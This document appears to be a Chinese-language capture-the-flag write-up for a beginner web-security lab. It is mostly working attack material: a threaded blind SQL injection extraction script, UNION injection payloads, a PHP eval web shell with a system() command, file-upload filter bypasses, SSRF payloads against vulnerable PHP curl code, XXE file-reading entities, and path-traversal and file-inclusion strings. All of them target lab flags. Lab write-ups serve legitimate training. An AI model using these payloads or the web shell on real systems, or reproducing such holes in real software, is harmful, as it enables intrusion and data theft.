            if req(f"\" AND ASCII(SUBSTRING((SELECT {col} FROM {table} LIMIT 0,1),{pos},1))=\"{code}"):
                chars[pos] = chr(code)
                break

    with ThreadPoolExecutor(MAX_THREAD) as pool:
        for pos in positions:
            pool.submit(probe, pos)
    data = "".join(chars.get(pos, "") for pos in positions)
    print(f"🏆 数据: {data}")
    return data
# ===================== 主程序 =====================
if __name__ == '__main__':
    # database -> tables -> columns -> first row per column; a stage that
    # returns None makes the following stage raise.
    db_name = get_db_name(get_db_len())
    tables = get_all_tables(db_name, get_table_count(db_name))
    for table in tables:
        for col in get_all_columns(db_name, table):
            get_data(table, col)
sql注入-POST类型注入-1
sql
admin' or '1'='1
select * from name where = ' UNION SELECT 1,user(),database(),version(),5,6,7 --'
select * from name where = ' UNION SELECT 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema ='sql_injection_lab' -- '
select * from name where =1' UNION SELECT 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name ='flag' -- '
select * from name where =1' UNION SELECT 1,flag,3,4,5,6,7 FROM flag-- '

sql注入-POST类型注入-2
sql
admin"or 1=1#
admin" union select 1,2,3,4,5,6,7#
admin" union select 1,2,database(),4,5,6,7#
admin" union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema='sql_injection_lab'#
admin" union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='flag'#
admin" union select 1,flag,3,4,5,6,7 from flag#

入门文件上传
文件上传漏洞01
随便写个马子
sql
<?php eval($_POST["0"])?>
直接利用

你想在前端做出花来吗
上传然后改后缀


我明明做了文件校验了?
MIME


你知道00截断吗
0.php%00.jpg

0=system("cat+/tmp/flag.txt");
文件上传简单绕过2.0
0.jpg.php
包含关键词就行
文件上传简单绕过3.0
0.pphphp
双写绕过
入门SSRF
最简单的PHP-SSRF
Payload
http://0x7f000001/?url=file:///tmp/flag.txt
SSRF不允许使用File协议了1
源码
php
164 <?php
165 if (isset($_GET['url'])) {
166 header("Content-Type: text/html; charset=utf-8");
167 // Read the user-supplied url parameter (untrusted input)
168 $url = $_GET['url'];
169
170 // Only a lowercase "file" prefix is rejected: strpos() is case-sensitive and
// compares text, not a parsed scheme, so an uppercase spelling passes. A
// real fix parses the value (parse_url), compares the scheme against an
// allowlist, and pins CURLOPT_PROTOCOLS / CURLOPT_REDIR_PROTOCOLS to HTTP(S)
// so curl itself refuses anything else.
171 if (strpos($url, 'file') === 0) {
172 echo "<div class='msg'>不允许使用file协议了!</div>";
173 exit;
174 }
175
176 // Initialise curl and send the request: this is the SSRF sink
177 $ch = curl_init();
178 curl_setopt($ch, CURLOPT_URL, $url); // user-controlled URL passed through verbatim
179 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the body instead of printing it
180 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // redirects are followed; the prefix check above only ever saw the initial URL
181 curl_setopt($ch, CURLOPT_TIMEOUT, 5); // 5 second timeout
182 $response = curl_exec($ch);
183 if ($response === false) {
184 $error = curl_error($ch);
185 curl_close($ch);
186 echo "<h3>SSRF请求结果:</h3>";
187 echo "<pre>cURL 错误: ".htmlspecialchars($error)."</pre>";
188 } else {
189 curl_close($ch);
190 // Echo the fetched body back to the caller (HTML-escaped, but otherwise in full)
191 echo "<h3>SSRF请求结果:</h3>";
192 echo "<pre>".htmlspecialchars($response)."</pre>";
193 }
194 }
payload
http://0x7f000001/?url=File:///tmp/flag.txt
SSRF不允许使用File协议了2
php
164 <?php
165 if (isset($_GET['url'])) {
166 header("Content-Type: text/html; charset=utf-8");
167 // Read the user-supplied url parameter (untrusted input)
168 $url = $_GET['url'];
169
170 // Case-insensitive now, but it still matches only the literal spelling
// "file://" at offset 0, whereas curl parses the URL by its own rules; the
// payload below shows a spelling that passes this check yet still reaches a
// local file. A string-prefix check is not a scheme allowlist: parse_url()
// plus CURLOPT_PROTOCOLS / CURLOPT_REDIR_PROTOCOLS restricted to HTTP(S)
// makes curl and the check agree on what is allowed.
170 if (stripos($url, 'file://') === 0) {
171 echo "<div class='msg'>不允许使用file协议了!</div>";
172 exit;
173 }
174
175 // Initialise curl and send the request: this is the SSRF sink
176 $ch = curl_init();
177 curl_setopt($ch, CURLOPT_URL, $url); // user-controlled URL passed through verbatim
178 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the body instead of printing it
179 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // redirects are followed; the prefix check above only ever saw the initial URL
180 curl_setopt($ch, CURLOPT_TIMEOUT, 5); // 5 second timeout
181 $response = curl_exec($ch);
182 if ($response === false) {
183 $error = curl_error($ch);
184 curl_close($ch);
185 echo "<h3>SSRF请求结果:</h3>";
186 echo "<pre>cURL 错误: ".htmlspecialchars($error)."</pre>";
187 } else {
188 curl_close($ch);
189 // Echo the fetched body back to the caller (HTML-escaped, but otherwise in full)
190 echo "<h3>SSRF请求结果:</h3>";
191 echo "<pre>".htmlspecialchars($response)."</pre>";
192 }
193 }
194 ?>
payload
file:\\/tmp/flag.txt
入门XXE
初级XXE
XML
<?xml version="1.0"?>
<!DOCTYPE data [ <!-- 声明根元素data -->
<!ELEMENT data ANY> <!-- 定义data元素可包含任何内容 -->
<!ENTITY xxe SYSTEM "file:///tmp/flag.txt"> <!-- 定义外部实体 -->
]>
<data> <!-- 实际根元素 -->
<username>&xxe;</username> <!-- 实体引用,显示flag -->
<email>test@example.com</email>
</data>
简单的XXE绕过1
XML
<?xml version="1.0"?>
<!DOCTYPE data [ <!-- 声明根元素data -->
<!ELEMENT data ANY> <!-- 定义data元素可包含任何内容 -->
<!ENTITY xxe SYSTEM "File:///tmp/flag.txt"> <!-- 定义外部实体 -->
]>
<data> <!-- 实际根元素 -->
<username>&xxe;</username> <!-- 实体引用,显示flag -->
<email>test@example.com</email>
</data>
XXE盲打
麻烦,懒得做了
入门文件读取
你需要了解什么是路径穿越
XML
../../../../../../tmp/flag.txt
任意文件读取的简单绕过1
XML
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/tmp/flag.txt
任意文件读取的简单绕过2
XML
....//....//....//....//....///tmp/flag.txt
入门文件包含
文件包含入门
XML
/tmp/flag.txt
文件包含,你需要会目录穿越
XML
../../../../tmp/flag.txt
文件包含,..被过滤了
XML
....//....//....//....//....///tmp/flag.txt
文件包含+上传图片
在上传文件的末尾加上一句话,然后包含图片蚁剑连接
入门文件下载
文件下载
XML
../../../../tmp/flag.txt
入门敏感文件泄露
我有一个备份我网站的好习惯
backup.zip
我喜欢用SVN
访问/.svn/目录,然后找到包含flag的备份文件,去掉.bak直接访问php文件获得flag
我喜欢用SVN-2
/.svn/wc.db

访问获得flag
我喜欢用git
/.git/index 中有 3b96e9fc-ae54-46bf-129e30-c167f825d7cf.php,访问获得flag
